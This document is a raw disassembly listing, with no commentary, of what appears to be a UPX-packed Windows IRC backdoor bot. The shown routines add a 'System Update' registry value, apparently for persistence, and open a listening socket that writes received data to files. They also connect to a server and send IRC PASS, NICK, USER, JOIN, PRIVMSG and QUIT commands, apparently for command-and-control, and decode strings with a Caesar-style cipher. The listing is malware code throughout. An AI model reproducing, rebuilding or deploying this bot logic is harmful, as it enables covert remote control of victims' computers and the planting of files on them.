push 0Ah
mov ebx, offset aZxfbioszeqz ; "zxfbioszeqz"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31501932
pop ecx
pop ecx
push ebx
call dword_315010A0
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_3150243D
add esp, 14h
jmp short loc_31502757
; ---------------------------------------------------------------------------
loc_31502748: ; CODE XREF: sub_315026C2+4D�j
lea eax, [ebp+var_20]
push eax
push offset aZxfbioszeqz ; "zxfbioszeqz"
call dword_31501088
loc_31502757: ; CODE XREF: sub_315026C2+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_3150279D
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_3150243D
lea eax, [ebp+var_84]
push eax
push 0
call sub_315025F6
add esp, 1Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_3150279D: ; CODE XREF: sub_315026C2+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31501064
test eax, eax
jnz short loc_315027E6
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315027FB
push ebx
push edi
push esi
mov ds:dword_315061A0, 1
call sub_315023AF
add esp, 0Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_315027E6: ; CODE XREF: sub_315026C2+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_315025F6
pop ecx
pop ecx
loc_315027FB: ; CODE XREF: sub_315026C2+1F�j
; sub_315026C2+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_315026C2 endp
; =============== S U B R O U T I N E =======================================
sub_31502800 proc near ; CODE XREF: sub_31501BA8+7A�p
; sub_315028AE+2A�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3150105C
retn
sub_31502800 endp
; =============== S U B R O U T I N E =======================================
sub_31502814 proc near ; CODE XREF: sub_315028AE+EB�p
; sub_31502B4C+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31501058
retn
sub_31502814 endp
; =============== S U B R O U T I N E =======================================
sub_31502826 proc near ; CODE XREF: sub_31502B4C+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31501088
mov eax, esi
pop esi
retn
sub_31502826 endp
; =============== S U B R O U T I N E =======================================
sub_3150283F proc near ; CODE XREF: sub_31502B4C+3A�p
push ebx
push ebp
mov ebx, dword_31501018
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+0Eh]
push ebp
push esi
call ebx
test eax, eax
jnz short loc_3150286E
push 8
push 1
push ebp
push ebp
push esi
call ebx
test eax, eax
jnz short loc_3150286E
push 1
pop eax
jmp short loc_3150288E
; ---------------------------------------------------------------------------
loc_3150286E: ; CODE XREF: sub_3150283F+1B�j
; sub_3150283F+28�j
add edi, 12h
push edi
push ebp
push ebp
push 114h
push offset dword_31505CF8
push dword ptr [esi]
call dword_3150101C
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3150288E: ; CODE XREF: sub_3150283F+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_3150283F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31502893 proc near ; CODE XREF: sub_31502B4C+7E�p
push esi
mov esi, ecx
push dword ptr [esi+12h]
call dword_31501010
push 0
push dword ptr [esi+0Eh]
call dword_31501014
xor eax, eax
pop esi
retn
sub_31502893 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315028AE proc near ; CODE XREF: sub_31502B4C+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_31501050
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31501054
mov esi, 4000h
push esi
call sub_31502800
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_315011A0
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_31503A44
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_3150298F
jl short loc_3150291C
cmp ecx, 61C46800h
ja short loc_3150298F
loc_3150291C: ; CODE XREF: sub_315028AE+64�j
cmp eax, 0FFFFFFF7h
jl short loc_3150298F
jg short loc_3150292B
cmp ecx, 9E3B9800h
jb short loc_3150298F
loc_3150292B: ; CODE XREF: sub_315028AE+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+0Eh]
call dword_31501000
test eax, eax
jz short loc_31502980
push 0
push 8
push esi
push [ebp+var_4]
call dword_31501004
test eax, eax
jz short loc_31502980
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_31502980
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+12h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31501008
test eax, eax
jnz short loc_315029A8
loc_31502980: ; CODE XREF: sub_315028AE+98�j
; sub_315028AE+AA�j ...
call dword_31501098
push [ebp+var_4]
call dword_3150100C
loc_3150298F: ; CODE XREF: sub_315028AE+62�j
; sub_315028AE+6C�j ...
call dword_31501098
push 2
pop esi
loc_31502998: ; CODE XREF: sub_315028AE+117�j
push edi
call sub_31502814
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_315029A8: ; CODE XREF: sub_315028AE+D0�j
push [ebp+var_4]
call dword_3150100C
call dword_31501124
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3150119C
jmp short loc_31502998
sub_315028AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315029C7 proc near ; CODE XREF: sub_31502B4C+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_315029E6
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_31502B3E
; ---------------------------------------------------------------------------
loc_315029E6: ; CODE XREF: sub_315029C7+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31502AF7
lea eax, [ebp+var_220]
push ebx
push eax
call dword_31501068
lea eax, [ebp+var_220]
push eax
call dword_31501048
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_315010A8
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_315010F0
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_31502AE5
mov ebx, dword_3150119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31502A8D
inc [ebp+arg_4]
loc_31502A8D: ; CODE XREF: sub_315029C7+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31502ADA
loc_31502A97: ; CODE XREF: sub_315029C7+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_315011A0
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31502ADA
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_3150104C
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31502A97
loc_31502ADA: ; CODE XREF: sub_315029C7+CE�j
; sub_315029C7+E5�j
push [ebp+var_C]
call dword_315010BC
jmp short loc_31502B47
; ---------------------------------------------------------------------------
loc_31502AE5: ; CODE XREF: sub_315029C7+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3150119C
loc_31502AF7: ; CODE XREF: sub_315029C7+31�j
cmp [ebp+arg_4], 1
jnz short loc_31502B26
lea eax, [ebp+var_118]
push ebx
push eax
call dword_31501068
lea eax, [ebp+var_118]
push eax
call dword_31501048
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3150119C
loc_31502B26: ; CODE XREF: sub_315029C7+134�j
cmp [ebp+arg_4], 3
jnz short loc_31502B47
push dword ptr [edi]
add edi, 4
push edi
call sub_31501962
pop ecx
pop ecx
push 0
push 4
push esi
loc_31502B3E: ; CODE XREF: sub_315029C7+1A�j
push [ebp+arg_0]
call dword_3150119C
loc_31502B47: ; CODE XREF: sub_315029C7+11C�j
; sub_315029C7+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_315029C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502B4C proc near ; DATA XREF: sub_31502BE8+AA�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_315018BA
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_30]
rep movsd
push [ebp+var_1C]
call dword_315010D8
mov esi, 10000h
push esi
call sub_31502800
pop ecx
mov edi, eax
lea ecx, [ebp+var_18]
call sub_31502826
lea ecx, [ebp+var_18]
call sub_3150283F
lea eax, [ebp+var_30]
lea ecx, [ebp+var_18]
push eax
call sub_315028AE
test eax, eax
jnz short loc_31502BC0
loc_31502B9B: ; CODE XREF: sub_31502B4C+72�j
push 0
push esi
push edi
push [ebp+var_30]
call dword_315011A0
cmp eax, 0FFFFFFFFh
jz short loc_31502BC0
test eax, eax
jz short loc_31502BC0
push eax
push edi
push [ebp+var_30]
call sub_315029C7
add esp, 0Ch
jmp short loc_31502B9B
; ---------------------------------------------------------------------------
loc_31502BC0: ; CODE XREF: sub_31502B4C+4D�j
; sub_31502B4C+5F�j ...
push edi
call sub_31502814
pop ecx
lea ecx, [ebp+var_18]
call sub_31502893
push [ebp+var_30]
call dword_315011A8
push 0
call dword_315010E0
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_31502B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31502BE8 proc near ; DATA XREF: sub_31501D96+156�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_3150118C
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31503A38
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31502C19: ; CODE XREF: sub_31502BE8+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31501194
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31501170
test eax, eax
jz short loc_31502C43
inc esi
cmp esi, 0Ah
jl short loc_31502C19
loc_31502C43: ; CODE XREF: sub_31502BE8+53�j
push 32h
push [ebp+var_4]
call dword_31501174
mov ebx, dword_315010BC
loc_31502C54: ; CODE XREF: sub_31502BE8+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31501178
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_3150108C
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_31502B4C
push esi
push esi
call dword_315010D0
push eax
call ebx
push 3E8h
push [ebp+var_30]
call dword_31501090
push [ebp+var_30]
call ebx
jmp short loc_31502C54
sub_31502BE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502CB7 proc near ; CODE XREF: sub_31502D3C+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31502CEA
add ebx, 1Ah
loc_31502CEA: ; CODE XREF: sub_31502CB7+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31501110
lea eax, [ebp+var_1C]
push edi
push eax
call esi
pop ecx
test eax, eax
pop ecx
jz short loc_31502D14
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D14: ; CODE XREF: sub_31502CB7+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi
pop ecx
test eax, eax
pop ecx
jz short loc_31502D34
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D34: ; CODE XREF: sub_31502CB7+68�j
mov al, [ebp+arg_0]
loc_31502D37: ; CODE XREF: sub_31502CB7+5B�j
; sub_31502CB7+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31502CB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502D3C proc near ; CODE XREF: sub_31503722+F7�p
; sub_31503722+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31502D97
mov edi, [ebp+arg_0]
push ebx
loc_31502D51: ; CODE XREF: sub_31502D3C+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31502CB7
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31502D7B
cmp bl, 7Ah
jg short loc_31502D7B
movsx esi, bl
sub esi, 61h
loc_31502D7B: ; CODE XREF: sub_31502D3C+32�j
; sub_31502D3C+37�j
cmp bl, 41h
jl short loc_31502D8B
cmp bl, 5Ah
jg short loc_31502D8B
movsx esi, bl
sub esi, 41h
loc_31502D8B: ; CODE XREF: sub_31502D3C+42�j
; sub_31502D3C+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31502D51
pop ebx
jmp short loc_31502D9A
; ---------------------------------------------------------------------------
loc_31502D97: ; CODE XREF: sub_31502D3C+F�j
mov edi, [ebp+arg_0]
loc_31502D9A: ; CODE XREF: sub_31502D3C+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31502D3C endp
; =============== S U B R O U T I N E =======================================
sub_31502DA1 proc near ; CODE XREF: UPX0:3150346E�p
push esi
mov esi, ecx
push 20001h
call sub_31502800
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31502DA1 endp
; =============== S U B R O U T I N E =======================================
sub_31502DB6 proc near ; CODE XREF: UPX0:315034CE�p
; UPX0:31503521�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_315010A8
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31502DB6 endp
; ---------------------------------------------------------------------------
loc_31502DD4: ; CODE XREF: UPX0:31503AD6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_31502814
push dword ptr [esi+2Ch]
call sub_31502814
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31502DEC proc near ; CODE XREF: UPX0:315034EC�p
; UPX0:3150353F�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_3150118C
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_315019B8
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31501194
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31501198
test eax, eax
jnz loc_31502FF1
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31501932
mov ebp, dword_3150113C
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp
mov edi, dword_315010A4
add esp, 14h
push 64h
call edi
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_315010A0
push eax
call ebx
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp
add esp, 0Ch
push 64h
call edi
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi
loc_31502F15: ; CODE XREF: sub_31502DEC+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31501120
pop ecx
test eax, eax
pop ecx
jz short loc_31502F9E
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31501932
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp
add esp, 14h
push 64h
call edi
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31502FF1
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31502F15
; ---------------------------------------------------------------------------
loc_31502F9E: ; CODE XREF: sub_31502DEC+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp
add esp, 10h
push 64h
call edi
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31502FFF
loc_31502FF1: ; CODE XREF: sub_31502DEC+4E�j
; sub_31502DEC+6B�j ...
push dword ptr [esi+5Ch]
call dword_315011A8
push 1
pop eax
jmp short loc_31503021
; ---------------------------------------------------------------------------
loc_31502FFF: ; CODE XREF: sub_31502DEC+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31503021: ; CODE XREF: sub_31502DEC+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31502DEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150302E proc near ; CODE XREF: sub_31502DEC+7C�p
; sub_31502DEC+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31501120
pop ecx
test eax, eax
pop ecx
jz short loc_315030A8
mov esi, dword_315010A0
lea edi, [eax+4]
push edi
call esi
dec eax
cmp eax, 63h
jle short loc_31503067
push 1
pop eax
jmp short loc_315030AA
; ---------------------------------------------------------------------------
loc_31503067: ; CODE XREF: sub_3150302E+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_315010A8
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_3150113C
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3150119C
loc_315030A8: ; CODE XREF: sub_3150302E+20�j
xor eax, eax
loc_315030AA: ; CODE XREF: sub_3150302E+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3150302E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315030B1 proc near ; CODE XREF: UPX0:3150358D�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_3150113C
mov edi, dword_315010A4
add esp, 0Ch
push 64h
call edi
lea eax, [ebp+var_12C]
push 0
push eax
call dword_315010A0
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C
push 64h
call edi
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_3150317A
test eax, eax
jz short loc_3150317A
push 64h
call edi
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov edi, dword_31501120
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi
pop ecx
test eax, eax
pop ecx
jz short loc_31503153
push 3
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503153: ; CODE XREF: sub_315030B1+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi
pop ecx
test eax, eax
pop ecx
jz short loc_31503167
push 4
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503167: ; CODE XREF: sub_315030B1+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_315010A8
xor eax, eax
jmp short loc_3150317D
; ---------------------------------------------------------------------------
loc_3150317A: ; CODE XREF: sub_315030B1+74�j
; sub_315030B1+78�j
push 2
loc_3150317C: ; CODE XREF: sub_315030B1+A0�j
; sub_315030B1+B4�j
pop eax
loc_3150317D: ; CODE XREF: sub_315030B1+C7�j
pop edi
pop esi
leave
retn 4
sub_315030B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503183 proc near ; CODE XREF: sub_315031EC+83�p
; UPX0:315035E9�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31501124
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31501932
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_3150113C
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_315010A0
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C
push dword ptr [esi+5Ch]
call dword_315011A8
xor eax, eax
pop esi
leave
retn
sub_31503183 endp
; =============== S U B R O U T I N E =======================================
sub_315031EC proc near ; CODE XREF: UPX0:315035D1�p
mov eax, offset loc_31503AC4
call sub_31503A98
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_315010C8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_31503227: ; CODE XREF: sub_315031EC+EF�j
call sub_31501A32
test eax, eax
jz short loc_31503274
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31501164
cmp eax, 0FFFFFFFFh
jz short loc_31503274
call sub_31501D82
test eax, eax
jz short loc_31503258
push 1
call dword_315010E0
loc_31503258: ; CODE XREF: sub_315031EC+62�j
mov [ebp-4], ebx
call edi
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_31503287
mov ecx, esi
call sub_31503183
loc_31503274: ; CODE XREF: sub_315031EC+42�j
; sub_315031EC+59�j ...
xor eax, eax
loc_31503276: ; CODE XREF: sub_315031EC+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31503287: ; CODE XREF: sub_315031EC+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_315032F2
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_315010A4
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503722
cmp eax, ebx
jnz short loc_31503274
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31501A32
test eax, eax
jz short loc_31503274
push 64h
call dword_315010A4
jmp loc_31503227
; ---------------------------------------------------------------------------
loc_315032E0: ; DATA XREF: UPX0:31503B3C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_315011A8
mov eax, offset loc_315032F2
retn
; ---------------------------------------------------------------------------
loc_315032F2: ; CODE XREF: sub_315031EC+B2�j
; DATA XREF: sub_315031EC+100�o
push 1
pop eax
jmp loc_31503276
sub_315031EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315032FA proc near ; CODE XREF: sub_31503722+9C�p
; sub_31503722+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_315010A0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi
push [ebp+arg_4]
mov ebx, eax
call esi
add ebx, eax
cmp ebx, 10Eh
jle short loc_31503329
push 1
pop eax
jmp short loc_3150336A
; ---------------------------------------------------------------------------
loc_31503329: ; CODE XREF: sub_315032FA+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_3150113C
add esp, 10h
push 64h
call dword_315010A4
lea eax, [ebp+var_12C]
push 0
push eax
call esi
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3150119C
xor eax, eax
loc_3150336A: ; CODE XREF: sub_315032FA+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_315032FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503371 proc near ; CODE XREF: UPX0:31503484�p
